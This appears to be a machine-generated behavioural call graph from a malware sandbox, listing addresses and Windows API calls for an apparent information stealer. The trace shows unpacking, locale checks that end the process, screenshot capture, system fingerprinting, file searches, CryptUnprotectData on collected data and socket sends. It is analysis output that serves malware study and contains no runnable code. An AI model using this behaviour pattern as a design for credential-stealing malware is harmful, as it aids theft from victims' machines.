145395->145651 145650 7d4870 15 API calls 145396->145650 145398->145388 145405 786950 145398->145405 145644 771d90 15 API calls 145398->145644 145645 771de0 20 API calls 145398->145645 145402 786eb7 145403 786f8e 145402->145403 145404 786f64 145402->145404 145655 7d4870 15 API calls 145403->145655 145654 7d4870 15 API calls 145404->145654 145405->145390 145416 786c63 145405->145416 145648 771d90 15 API calls 145405->145648 145649 771de0 20 API calls 145405->145649 145409 7871c9 145411 7872a0 145409->145411 145412 787276 145409->145412 145659 7d4870 15 API calls 145411->145659 145658 7d4870 15 API calls 145412->145658 145414 7874e7 145419 7875bf 145414->145419 145420 787595 145414->145420 145416->145402 145424 786f86 145416->145424 145652 771d90 15 API calls 145416->145652 145653 771de0 20 API calls 145416->145653 145663 7d4870 15 API calls 145419->145663 145662 7d4870 15 API calls 145420->145662 145422 7877fa 145427 7878a8 145422->145427 145428 7878d2 145422->145428 145424->145409 145431 787298 145424->145431 145656 771d90 15 API calls 145424->145656 145657 771de0 20 API calls 145424->145657 145666 7d4870 15 API calls 145427->145666 145667 7d4870 15 API calls 145428->145667 145429 787b0d 145435 787bbb 145429->145435 145436 787be5 145429->145436 145431->145414 145437 7875b7 145431->145437 145660 771d90 15 API calls 145431->145660 145661 771de0 20 API calls 145431->145661 145670 7d4870 15 API calls 145435->145670 145671 7d4870 15 API calls 145436->145671 145437->145422 145450 7878ca 145437->145450 145664 771d90 15 API calls 145437->145664 145665 771de0 20 API calls 145437->145665 145441 787e20 145444 787ef8 145441->145444 145445 787ece 145441->145445 145443 788b71 VirtualAlloc 145502 788ba8 145443->145502 145675 7d4870 15 API calls 145444->145675 145674 7d4870 15 API calls 145445->145674 145448 788133 145452 78820b 145448->145452 145453 7881e1 145448->145453 145450->145429 145457 787bdd 145450->145457 145668 771d90 15 API calls 145450->145668 145669 771de0 20 API calls 145450->145669 145679 7d4870 15 API calls 145452->145679 145678 7d4870 15 API calls 145453->145678 145455 788446 145460 78851e 145455->145460 145461 7884f4 145455->145461 145457->145441 145464 787ef0 145457->145464 145672 771d90 15 API calls 145457->145672 145673 771de0 20 API calls 145457->145673 145683 7d4870 15 API calls 145460->145683 145682 7d4870 15 API calls 145461->145682 145462 788759 145468 788831 145462->145468 145469 788807 145462->145469 145464->145448 145470 788203 145464->145470 145676 771d90 15 API calls 145464->145676 145677 771de0 20 API calls 145464->145677 145687 7d4870 15 API calls 145468->145687 145686 7d4870 15 API calls 145469->145686 145470->145455 145479 788516 145470->145479 145680 771d90 15 API calls 145470->145680 145681 771de0 20 API calls 145470->145681 145474 788a6c 145476 788b1a 145474->145476 145477 788b44 145474->145477 145690 7d4870 15 API calls 145476->145690 145691 7d4870 15 API calls 145477->145691 145478 7897c2 145489 789815 VirtualAlloc 145478->145489 145532 78985a 145478->145532 145479->145462 145492 788829 145479->145492 145684 771d90 15 API calls 145479->145684 145685 771de0 20 API calls 145479->145685 145483 788db3 145486 788e91 145483->145486 145487 788e67 145483->145487 145485 788b3c 145485->145443 145695 7d4870 15 API calls 145486->145695 145694 7d4870 15 API calls 145487->145694 145497 78983f 145489->145497 145489->145532 145490 7890cc 145495 78917a 145490->145495 145496 7891a4 145490->145496 145492->145443 145492->145474 145688 771d90 15 API calls 145492->145688 145689 771de0 20 API calls 145492->145689 145698 7d4870 15 API calls 145495->145698 145699 7d4870 15 API calls 145496->145699 145708 7d106c RaiseException 145497->145708 145499 7893df 145505 78948d 145499->145505 145506 7894b7 145499->145506 145502->145483 145508 788e89 145502->145508 145692 771d90 15 API calls 145502->145692 145693 771de0 20 API calls 145502->145693 145702 7d4870 15 API calls 145505->145702 145703 7d4870 15 API calls 145506->145703 145508->145490 145515 78919c 145508->145515 145696 771d90 15 API calls 145508->145696 145697 771de0 20 API calls 145508->145697 145512 7897ca 145707 7d4870 15 API calls 145512->145707 145513 7897a0 145706 7d4870 15 API calls 145513->145706 145514 7896f2 145514->145512 145514->145513 145515->145499 145519 7894af 145515->145519 145700 771d90 15 API calls 145515->145700 145701 771de0 20 API calls 145515->145701 145519->145478 145519->145514 145704 771d90 15 API calls 145519->145704 145705 771de0 20 API calls 145519->145705 145521 789a68 145522 789b40 145521->145522 145523 789b16 145521->145523 145712 7d4870 15 API calls 145522->145712 145711 7d4870 15 API calls 145523->145711 145525 789d7b 145529 789e29 145525->145529 145530 789e53 145525->145530 145715 7d4870 15 API calls 145529->145715 145716 7d4870 15 API calls 145530->145716 145532->145521 145541 789b38 145532->145541 145709 771d90 15 API calls 145532->145709 145710 771de0 20 API calls 145532->145710 145535 78a09a 145537 78a148 145535->145537 145538 78a172 145535->145538 145719 7d4870 15 API calls 145537->145719 145720 7d4870 15 API calls 145538->145720 145539 78a3ad 145545 78a45b 145539->145545 145546 78a485 145539->145546 145541->145525 145547 789e4b 145541->145547 145713 771d90 15 API calls 145541->145713 145714 771de0 20 API calls 145541->145714 145723 7d4870 15 API calls 145545->145723 145724 7d4870 15 API calls 145546->145724 145547->145535 145560 78a16a 145547->145560 145717 771d90 15 API calls 145547->145717 145718 771de0 20 API calls 145547->145718 145551 78a6ca 145553 78a778 145551->145553 145554 78a7a2 145551->145554 145727 7d4870 15 API calls 145553->145727 145728 7d4870 15 API calls 145554->145728 145558 78a9dd 145561 78aa8b 145558->145561 145562 78aab5 145558->145562 145560->145539 145566 78a47d 145560->145566 145721 771d90 15 API calls 145560->145721 145722 771de0 20 API calls 145560->145722 145731 7d4870 15 API calls 145561->145731 145732 7d4870 15 API calls 145562->145732 145564 78ad04 145569 78addc 145564->145569 145570 78adb2 145564->145570 145566->145551 145573 78a79a 145566->145573 145725 771d90 15 API calls 145566->145725 145726 771de0 20 API calls 145566->145726 145736 7d4870 15 API calls 145569->145736 145735 7d4870 15 API calls 145570->145735 145571 78b017 145577 78b0ef 145571->145577 145578 78b0c5 145571->145578 145573->145558 145580 78aaad 145573->145580 145729 771d90 15 API calls 145573->145729 145730 771de0 20 API calls 145573->145730 145740 7d4870 15 API calls 145577->145740 145739 7d4870 15 API calls 145578->145739 145580->145564 145587 78add4 145580->145587 145733 771d90 15 API calls 145580->145733 145734 771de0 20 API calls 145580->145734 145584 78b40e 145744 7d4870 15 API calls 145584->145744 145585 78b3e4 145743 7d4870 15 API calls 145585->145743 145586 78b336 145586->145584 145586->145585 145587->145571 145597 78b0e7 145587->145597 145737 771d90 15 API calls 145587->145737 145738 771de0 20 API calls 145587->145738 145591 78b661 145594 78b73f 145591->145594 145595 78b715 145591->145595 145593 78b406 145593->145591 145601 78b737 codecvt 145593->145601 145745 771d90 15 API calls 145593->145745 145746 771de0 20 API calls 145593->145746 145748 7d4870 15 API calls 145594->145748 145747 7d4870 15 API calls 145595->145747 145597->145586 145597->145593 145741 771d90 15 API calls 145597->145741 145742 771de0 20 API calls 145597->145742 145599 78ba85 145602 78bdb6 codecvt 145599->145602 145609 78bce0 145599->145609 145753 771d90 15 API calls 145599->145753 145754 771de0 20 API calls 145599->145754 145601->145599 145604 78b9af 145601->145604 145749 771d90 15 API calls 145601->145749 145750 771de0 20 API calls 145601->145750 145617 78c0b2 145602->145617 145627 78c187 145602->145627 145757 771d90 15 API calls 145602->145757 145758 771de0 20 API calls 145602->145758 145605 78ba8d 145604->145605 145606 78ba63 145604->145606 145752 7d4870 15 API calls 145605->145752 145751 7d4870 15 API calls 145606->145751 145612 78bdbe 145609->145612 145613 78bd94 145609->145613 145756 7d4870 15 API calls 145612->145756 145755 7d4870 15 API calls 145613->145755 145619 78c18f 145617->145619 145620 78c165 145617->145620 145760 7d4870 15 API calls 145619->145760 145759 7d4870 15 API calls 145620->145759 145625 78c4bf 145764 7d4870 15 API calls 145625->145764 145626 78c495 145763 7d4870 15 API calls 145626->145763 145627->145361 145628 78c3e2 145627->145628 145761 771d90 15 API calls 145627->145761 145762 771de0 20 API calls 145627->145762 145628->145625 145628->145626 145632->145370 145633->145370 145634->145383 145635->145383 145636->145383 145637->145383 145638->145392 145639->145392 145640->145392 145641->145392 145642->145398 145643->145398 145644->145398 145645->145398 145646->145405 145647->145405 145648->145405 145649->145405 145650->145416 145651->145416 145652->145416 145653->145416 145654->145424 145655->145424 145656->145424 145657->145424 145658->145431 145659->145431 145660->145431 145661->145431 145662->145437 145663->145437 145664->145437 145665->145437 145666->145450 145667->145450 145668->145450 145669->145450 145670->145457 145671->145457 145672->145457 145673->145457 145674->145464 145675->145464 145676->145464 145677->145464 145678->145470 145679->145470 145680->145470 145681->145470 145682->145479 145683->145479 145684->145479 145685->145479 145686->145492 145687->145492 145688->145492 145689->145492 145690->145485 145691->145485 145692->145502 145693->145502 145694->145508 145695->145508 145696->145508 145697->145508 145698->145515 145699->145515 145700->145515 145701->145515 145702->145519 145703->145519 145704->145519 145705->145519 145706->145478 145707->145478 145708->145532 145709->145532 145710->145532 145711->145541 145712->145541 145713->145541 145714->145541 145715->145547 145716->145547 145717->145547 145718->145547 145719->145560 145720->145560 145721->145560 145722->145560 145723->145566 145724->145566 145725->145566 145726->145566 145727->145573 145728->145573 145729->145573 145730->145573 145731->145580 145732->145580 145733->145580 145734->145580 145735->145587 145736->145587 145737->145587 145738->145587 145739->145597 145740->145597 145741->145597 145742->145597 145743->145593 145744->145593 145745->145593 145746->145593 145747->145601 145748->145601 145749->145601 145750->145601 145751->145599 145752->145599 145753->145599 145754->145599 145755->145602 145756->145602 145757->145602 145758->145602 145759->145627 145760->145627 145761->145627 145762->145627 145763->145361 145764->145361 145765 7814b9 145775 7814c2 145765->145775 145766 781779 145843 783fe0 145766->145843 145768 7816a9 145770 781781 145768->145770 145771 781757 145768->145771 145881 7d4870 15 API calls 145770->145881 145880 7d4870 15 API calls 145771->145880 145775->145766 145775->145768 145878 771d90 15 API calls 145775->145878 145879 771de0 20 API calls 145775->145879 145777 781a5a 145884 7d4870 15 API calls 145777->145884 145778 781a84 145885 7d4870 15 API calls 145778->145885 145779 7819ac 145779->145777 145779->145778 145783 781cbf 145787 781d6d 145783->145787 145788 781d97 145783->145788 145785 781a7c 145785->145783 145786 781d8f 145785->145786 145886 771d90 15 API calls 145785->145886 145887 771de0 20 API calls 145785->145887 145790 781fd2 145786->145790 145795 7820a2 145786->145795 145890 771d90 15 API calls 145786->145890 145891 771de0 20 API calls 145786->145891 145888 7d4870 15 API calls 145787->145888 145889 7d4870 15 API calls 145788->145889 145796 7820aa 145790->145796 145797 782080 145790->145797 145792 7817b3 145792->145779 145792->145785 145882 771d90 15 API calls 145792->145882 145883 771de0 20 API calls 145792->145883 145801 7823bc 145795->145801 145803 7822ed 145795->145803 145894 771d90 15 API calls 145795->145894 145895 771de0 20 API calls 145795->145895 145893 7d4870 15 API calls 145796->145893 145892 7d4870 15 API calls 145797->145892 145810 7825ff 145801->145810 145818 7826ce 145801->145818 145898 771d90 15 API calls 145801->145898 145899 771de0 20 API calls 145801->145899 145804 78239a 145803->145804 145805 7823c4 145803->145805 145896 7d4870 15 API calls 145804->145896 145897 7d4870 15 API calls 145805->145897 145811 7826ac 145810->145811 145812 7826d6 145810->145812 145900 7d4870 15 API calls 145811->145900 145901 7d4870 15 API calls 145812->145901 145816 782911 145820 7829e8 145816->145820 145821 7829be 145816->145821 145818->145816 145840 7829e0 145818->145840 145902 771d90 15 API calls 145818->145902 145903 771de0 20 API calls 145818->145903 145819 783011 145825 78306a LoadLibraryA CreateThread WaitForSingleObject FreeLibrary 145819->145825 145826 7830ce 145819->145826 145905 7d4870 15 API calls 145820->145905 145904 7d4870 15 API calls 145821->145904 145825->145826 145930 38f21f5 InitializeCriticalSectionAndSpinCount 145825->145930 145827 782c26 145829 782cfd 145827->145829 145830 782cd3 145827->145830 145909 7d4870 15 API calls 145829->145909 145908 7d4870 15 API calls 145830->145908 145834 782f42 145836 783019 145834->145836 145837 782fef 145834->145837 145913 7d4870 15 API calls 145836->145913 145912 7d4870 15 API calls 145837->145912 145840->145827 145842 782cf5 145840->145842 145906 771d90 15 API calls 145840->145906 145907 771de0 20 API calls 145840->145907 145842->145819 145842->145834 145910 771d90 15 API calls 145842->145910 145911 771de0 20 API calls 145842->145911 145854 78400f 145843->145854 145845 784bae 145845->145792 145846 7841c0 145847 78424a 145846->145847 145848 784274 145846->145848 145918 7d4870 15 API calls 145847->145918 145919 7d4870 15 API calls 145848->145919 145850 784473 145855 7844fd 145850->145855 145856 784527 145850->145856 145854->145846 145867 78426c 145854->145867 145916 771d90 15 API calls 145854->145916 145917 771de0 20 API calls 145854->145917 145922 7d4870 15 API calls 145855->145922 145923 7d4870 15 API calls 145856->145923 145860 784717 145862 7847cb 145860->145862 145863 7847a1 145860->145863 145927 7d4870 15 API calls 145862->145927 145926 7d4870 15 API calls 145863->145926 145867->145850 145870 78451f 145867->145870 145920 771d90 15 API calls 145867->145920 145921 771de0 20 API calls 145867->145921 145869 7849bb 145869->145845 145871 784a6d GetModuleHandleA GetProcAddress 145869->145871 145870->145860 145873 7847c3 145870->145873 145924 771d90 15 API calls 145870->145924 145925 771de0 20 API calls 145870->145925 145874 784a9f codecvt 145871->145874 145873->145869 145928 771d90 15 API calls 145873->145928 145929 771de0 20 API calls 145873->145929 145875 784b3a VirtualProtect VirtualProtect 145874->145875 145914 7d0910 145875->145914 145878->145775 145879->145775 145880->145766 145881->145766 145882->145792 145883->145792 145884->145785 145885->145785 145886->145785 145887->145785 145888->145786 145889->145786 145890->145786 145891->145786 145892->145795 145893->145795 145894->145795 145895->145795 145896->145801 145897->145801 145898->145801 145899->145801 145900->145818 145901->145818 145902->145818 145903->145818 145904->145840 145905->145840 145906->145840 145907->145840 145908->145842 145909->145842 145910->145842 145911->145842 145912->145819 145913->145819 145915 784b84 VirtualProtect 145914->145915 145915->145845 145916->145854 145917->145854 145918->145867 145919->145867 145920->145867 145921->145867 145922->145870 145923->145870 145924->145870 145925->145870 145926->145873 145927->145873 145928->145873 145929->145873 145931 38f2219 CreateMutexA 145930->145931 145932 38f2214 145930->145932 145933 38f2678 ExitProcess 145931->145933 145934 38f2235 GetLastError 145931->145934 145934->145933 145935 38f2246 145934->145935 146008 38f3bd2 145935->146008 145937 38f264f DeleteCriticalSection 145937->145933 145938 38f2251 145938->145937 146012 38f47e6 145938->146012 145941 38f2647 145943 38f3536 2 API calls 145941->145943 145943->145937 145948 38f22e0 146035 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 145948->146035 145950 38f22ef 146036 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 145950->146036 145952 38f25df 146101 38f3d76 EnterCriticalSection 145952->146101 145954 38f25f8 146114 38f3536 145954->146114 145955 38f22fe 145955->145952 146037 38f46d4 GetModuleHandleA 145955->146037 145958 38f2360 145958->145952 146040 38f1f2d GetUserDefaultUILanguage 145958->146040 145960 38f3536 2 API calls 145962 38f2610 145960->145962 145964 38f3536 2 API calls 145962->145964 145966 38f261b 145964->145966 145965 38f23b4 145965->145932 145969 38f23dd ExitProcess 145965->145969 145972 38f23e5 145965->145972 145968 38f3536 2 API calls 145966->145968 145967 38f46d4 2 API calls 145967->145965 145970 38f2626 145968->145970 145970->145941 146117 38f536d 145970->146117 145973 38f2412 ExitProcess 145972->145973 145974 38f241a 145972->145974 145975 38f244f 145974->145975 145976 38f2447 ExitProcess 145974->145976 146051 38f4ba2 145975->146051 145984 38f251f 145986 38f35db 11 API calls 145984->145986 145985 38f2532 146129 38f5239 145985->146129 145986->145985 145988 38f2543 145989 38f5239 4 API calls 145988->145989 145990 38f2551 145989->145990 145991 38f5239 4 API calls 145990->145991 145992 38f2561 145991->145992 145993 38f5239 4 API calls 145992->145993 145994 38f2570 145993->145994 145995 38f5239 4 API calls 145994->145995 145996 38f2580 145995->145996 145997 38f5239 4 API calls 145996->145997 145998 38f258f 145997->145998 146133 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 145998->146133 146000 38f2599 146001 38f25b2 146000->146001 146002 38f25a2 GetModuleFileNameW 146000->146002 146003 38f5239 4 API calls 146001->146003 146002->146001 146004 38f25cc 146003->146004 146005 38f5239 4 API calls 146004->146005 146006 38f25d7 146005->146006 146007 38f3536 2 API calls 146006->146007 146007->145952 146009 38f3bda 146008->146009 146134 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146009->146134 146011 38f3be5 146011->145938 146013 38f46d4 2 API calls 146012->146013 146014 38f4812 146013->146014 146015 38f2283 146014->146015 146016 38f5239 4 API calls 146014->146016 146015->145941 146021 38f35db 146015->146021 146017 38f4828 146016->146017 146018 38f5239 4 API calls 146017->146018 146019 38f4833 146018->146019 146020 38f5239 4 API calls 146019->146020 146020->146015 146135 38f2c08 146021->146135 146024 38f484b 146025 38f4860 VirtualAlloc 146024->146025 146028 38f22c4 146024->146028 146026 38f487f 146025->146026 146025->146028 146027 38f46d4 2 API calls 146026->146027 146029 38f48a1 146027->146029 146028->145941 146034 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146028->146034 146029->146028 146030 38f48d0 GetCurrentProcess IsWow64Process 146029->146030 146032 38f5239 4 API calls 146030->146032 146033 38f48fa 146032->146033 146033->146028 146034->145948 146035->145950 146036->145955 146038 38f46ff 146037->146038 146039 38f46f2 LoadLibraryA 146037->146039 146038->145958 146039->146038 146041 38f1fa0 146040->146041 146042 38f35db 11 API calls 146041->146042 146043 38f1fd8 146042->146043 146044 38f35db 11 API calls 146043->146044 146045 38f1fe7 GetKeyboardLayoutList 146044->146045 146046 38f2042 146045->146046 146047 38f2001 146045->146047 146048 38f35db 11 API calls 146046->146048 146047->146046 146050 38f35db 11 API calls 146047->146050 146049 38f204e 146048->146049 146049->145965 146049->145967 146050->146047 146052 38f4bb8 146051->146052 146053 38f2468 CreateThread CreateThread WaitForMultipleObjects 146051->146053 146054 38f46d4 2 API calls 146052->146054 146078 38f19df 146053->146078 146310 38f519f 146053->146310 146318 38f1d3c 146053->146318 146055 38f4be9 146054->146055 146055->146053 146056 38f46d4 2 API calls 146055->146056 146057 38f4bfe 146056->146057 146057->146053 146058 38f4c06 KiUserCallbackDispatcher GetSystemMetrics 146057->146058 146059 38f4c2b 146058->146059 146060 38f4c51 GetDC 146059->146060 146060->146053 146061 38f4c65 GetCurrentObject 146060->146061 146062 38f4c78 GetObjectW 146061->146062 146063 38f4e17 ReleaseDC 146061->146063 146062->146063 146064 38f4c8f 146062->146064 146063->146053 146065 38f35db 11 API calls 146064->146065 146066 38f4caf DeleteObject CreateCompatibleDC 146065->146066 146066->146063 146067 38f4d24 CreateDIBSection 146066->146067 146068 38f4d45 SelectObject 146067->146068 146069 38f4e10 DeleteDC 146067->146069 146070 38f4e09 DeleteObject 146068->146070 146071 38f4d55 BitBlt 146068->146071 146069->146063 146070->146069 146071->146070 146072 38f4d7a 146071->146072 146150 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146072->146150 146074 38f4d85 146074->146070 146075 38f3d76 10 API calls 146074->146075 146076 38f4dfe 146075->146076 146077 38f3536 2 API calls 146076->146077 146077->146070 146079 38f19ed 146078->146079 146083 38f1a26 146078->146083 146081 38f1a09 146079->146081 146151 38f1000 146079->146151 146082 38f1000 57 API calls 146081->146082 146081->146083 146082->146083 146084 38f2054 146083->146084 146305 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146084->146305 146086 38f2103 GetCurrentHwProfileA 146087 38f212d GetSystemInfo 146086->146087 146088 38f2117 146086->146088 146090 38f35db 11 API calls 146087->146090 146089 38f35db 11 API calls 146088->146089 146092 38f212a 146089->146092 146093 38f214f 146090->146093 146091 38f2079 146091->146086 146092->146087 146094 38f3536 2 API calls 146093->146094 146095 38f2159 GlobalMemoryStatusEx 146094->146095 146096 38f35db 11 API calls 146095->146096 146099 38f2188 146096->146099 146097 38f21db EnumDisplayDevicesA 146098 38f21ee ObtainUserAgentString 146097->146098 146097->146099 146098->145984 146098->145985 146099->146097 146100 38f35db 11 API calls 146099->146100 146100->146099 146102 38f3ea4 LeaveCriticalSection 146101->146102 146103 38f3d98 146101->146103 146102->145954 146103->146102 146306 38f3d1c 6 API calls 146103->146306 146105 38f3dc1 146105->146102 146307 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146105->146307 146107 38f3dec 146308 38f6c7f EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146107->146308 146109 38f3536 2 API calls 146111 38f3e4f 146109->146111 146110 38f3df6 146110->146109 146112 38f3536 2 API calls 146111->146112 146113 38f3e9f 146112->146113 146113->146102 146115 38f2605 146114->146115 146116 38f353a GetProcessHeap RtlFreeHeap 146114->146116 146115->145960 146116->146115 146118 38f46d4 2 API calls 146117->146118 146120 38f53f0 146118->146120 146119 38f53f8 146119->145970 146120->146119 146121 38f546d socket 146120->146121 146121->146119 146122 38f5491 146121->146122 146122->146119 146123 38f54b1 connect 146122->146123 146124 38f54c8 send 146123->146124 146125 38f5517 Sleep 146123->146125 146124->146125 146126 38f54ea send 146124->146126 146125->146122 146126->146125 146127 38f5506 146126->146127 146128 38f3536 2 API calls 146127->146128 146128->146119 146130 38f525c 146129->146130 146131 38f5288 146129->146131 146130->146131 146309 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146130->146309 146131->145988 146133->146000 146134->146011 146136 38f2c18 146135->146136 146146 38f2c26 146135->146146 146147 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146136->146147 146138 38f2c76 146139 38f22a9 146138->146139 146149 38f51f6 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146138->146149 146139->146024 146141 38f3036 146142 38f3536 2 API calls 146141->146142 146142->146139 146144 38f2e29 WideCharToMultiByte 146144->146146 146145 38f2eb1 WideCharToMultiByte 146145->146146 146146->146138 146146->146144 146146->146145 146148 38f2991 WideCharToMultiByte IsDBCSLeadByte WideCharToMultiByte __aulldvrm 146146->146148 146147->146146 146148->146146 146149->146141 146150->146074 146152 38f101e 146151->146152 146153 38f1412 146151->146153 146152->146153 146188 38f407d GetFileAttributesW 146152->146188 146153->146081 146155 38f1035 146155->146153 146189 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146155->146189 146157 38f1049 146190 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146157->146190 146159 38f1052 146165 38f13d5 146159->146165 146191 38f3600 146159->146191 146160 38f3536 2 API calls 146162 38f140b 146160->146162 146164 38f3536 2 API calls 146162->146164 146164->146153 146165->146160 146166 38f13bd FindNextFileW 146166->146165 146171 38f1173 146166->146171 146168 38f3600 7 API calls 146168->146171 146169 38f3eb6 41 API calls 146169->146171 146171->146166 146171->146168 146171->146169 146175 38f1662 EnterCriticalSection 146171->146175 146177 38f3536 GetProcessHeap RtlFreeHeap 146171->146177 146181 38f3d76 10 API calls 146171->146181 146185 38f1000 53 API calls 146171->146185 146186 38f1389 146171->146186 146194 38f446c 146171->146194 146226 38f369c 146171->146226 146230 38f1a62 146171->146230 146238 38f1c94 146171->146238 146245 38f1ba5 146171->146245 146282 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146171->146282 146256 38f4e27 146175->146256 146177->146171 146180 38f40ba 15 API calls 146180->146186 146181->146171 146183 38f3600 7 API calls 146183->146186 146185->146171 146186->146171 146186->146180 146186->146183 146187 38f3efc 43 API calls 146186->146187 146248 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146186->146248 146249 38f3eb6 146186->146249 146187->146186 146188->146155 146189->146157 146190->146159 146283 38f3084 146191->146283 146292 38f407d GetFileAttributesW 146194->146292 146196 38f447e 146197 38f46cd 146196->146197 146293 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146196->146293 146197->146171 146199 38f4494 146200 38f46c5 146199->146200 146202 38f3600 7 API calls 146199->146202 146201 38f3536 2 API calls 146200->146201 146201->146197 146203 38f44b1 146202->146203 146204 38f44cf EnterCriticalSection 146203->146204 146205 38f4539 LeaveCriticalSection 146204->146205 146206 38f4552 146205->146206 146207 38f459b 146205->146207 146206->146207 146209 38f456f 146206->146209 146207->146200 146208 38f45be EnterCriticalSection 146207->146208 146211 38f45f5 LeaveCriticalSection 146208->146211 146295 38f42ec 21 API calls 146209->146295 146213 38f460d 146211->146213 146214 38f4691 EnterCriticalSection 146211->146214 146212 38f4574 146212->146207 146215 38f4578 146212->146215 146294 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146213->146294 146220 38f46ba LeaveCriticalSection 146214->146220 146217 38f3536 2 API calls 146215->146217 146219 38f4580 146217->146219 146218 38f4617 146218->146214 146223 38f4634 EnterCriticalSection 146218->146223 146221 38f446c 29 API calls 146219->146221 146220->146200 146222 38f4594 146221->146222 146222->146197 146224 38f4675 LeaveCriticalSection 146223->146224 146224->146214 146225 38f4689 146224->146225 146225->146214 146227 38f36b0 146226->146227 146229 38f36b4 146227->146229 146296 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146227->146296 146229->146171 146231 38f1a7a 146230->146231 146233 38f1a7f 146230->146233 146297 38f1a2d EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146231->146297 146237 38f1a84 146233->146237 146298 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146233->146298 146235 38f1ab3 146235->146237 146299 38f1a4f GetProcessHeap RtlFreeHeap 146235->146299 146237->146171 146239 38f46d4 2 API calls 146238->146239 146240 38f1ccd 146239->146240 146241 38f1cdd CryptUnprotectData 146240->146241 146242 38f1cfa 146240->146242 146241->146242 146243 38f1d05 146241->146243 146242->146171 146243->146242 146244 38f1d0c CryptProtectData 146243->146244 146244->146242 146300 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146245->146300 146247 38f1bcb 146247->146171 146248->146186 146250 38f446c 37 API calls 146249->146250 146251 38f3ecc 146250->146251 146252 38f3eeb 146251->146252 146254 38f3d76 10 API calls 146251->146254 146253 38f3536 2 API calls 146252->146253 146255 38f3ef4 146253->146255 146254->146252 146255->146186 146257 38f4e49 146256->146257 146265 38f4e8a 146256->146265 146258 38f3600 7 API calls 146257->146258 146260 38f4e80 146258->146260 146303 38f407d GetFileAttributesW 146260->146303 146261 38f4eaa 146302 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146261->146302 146264 38f4eb4 146266 38f3600 7 API calls 146264->146266 146267 38f167e LeaveCriticalSection 146265->146267 146301 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146265->146301 146268 38f4ec2 FindFirstFileW 146266->146268 146267->146171 146269 38f5183 146268->146269 146281 38f4edf 146268->146281 146270 38f3536 2 API calls 146269->146270 146271 38f518a 146270->146271 146272 38f3536 2 API calls 146271->146272 146272->146267 146273 38f516b FindNextFileW 146273->146269 146273->146281 146274 38f3eb6 41 API calls 146274->146281 146275 38f4f84 EnterCriticalSection 146277 38f4e27 41 API calls 146275->146277 146278 38f4f9f LeaveCriticalSection 146277->146278 146278->146273 146279 38f4e27 41 API calls 146279->146281 146280 38f3600 7 API calls 146280->146281 146281->146273 146281->146274 146281->146275 146281->146279 146281->146280 146304 38f407d GetFileAttributesW 146281->146304 146282->146171 146289 38f3090 146283->146289 146284 38f1156 FindFirstFileW 146284->146165 146284->146171 146286 38f329d IsDBCSLeadByte 146287 38f32aa MultiByteToWideChar 146286->146287 146286->146289 146287->146289 146288 38f3308 IsDBCSLeadByte 146288->146289 146289->146284 146289->146286 146289->146288 146290 38f3329 MultiByteToWideChar 146289->146290 146291 38f2991 WideCharToMultiByte IsDBCSLeadByte WideCharToMultiByte __aulldvrm 146289->146291 146290->146289 146291->146289 146292->146196 146293->146199 146294->146218 146295->146212 146296->146229 146297->146233 146298->146235 146299->146237 146300->146247 146301->146261 146302->146264 146303->146265 146304->146281 146305->146091 146306->146105 146307->146107 146308->146110 146309->146130 146311 38f51ee 146310->146311 146312 38f51ad 146310->146312 146334 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146312->146334 146314 38f4e27 45 API calls 146315 38f51b7 146314->146315 146315->146314 146316 38f51e7 146315->146316 146317 38f3536 2 API calls 146316->146317 146317->146311 146319 38f1f25 146318->146319 146320 38f1d54 146318->146320 146320->146319 146321 38f3600 7 API calls 146320->146321 146322 38f1d75 FindFirstFileW 146321->146322 146322->146319 146323 38f1d94 146322->146323 146335 38f3508 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146323->146335 146325 38f1f01 FindNextFileW 146326 38f1f1c 146325->146326 146332 38f1d9e 146325->146332 146327 38f3536 2 API calls 146326->146327 146327->146319 146329 38f3536 2 API calls 146329->146332 146330 38f1d3c 41 API calls 146330->146332 146331 38f3600 7 API calls 146331->146332 146332->146325 146332->146329 146332->146330 146332->146331 146333 38f3eb6 41 API calls 146332->146333 146336 38f408d 146332->146336 146333->146332 146334->146315 146335->146332 146338 38f4095 146336->146338 146337 38f40a7 146337->146332 146338->146337 146341 38f3657 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 146338->146341 146340 38f40b7 146340->146332 146341->146340 146342 7cfe5f 146343 7cfe68 146342->146343 146350 7d013c IsProcessorFeaturePresent 146343->146350 146345 7cfe74 146351 7d2f0e 10 API calls 2 library calls 146345->146351 146347 7cfe79 146348 7cfe7d 146347->146348 146352 7d2f2d 7 API calls 2 library calls 146347->146352 146350->146345 146351->146347 146352->146348 146353 77e6ee 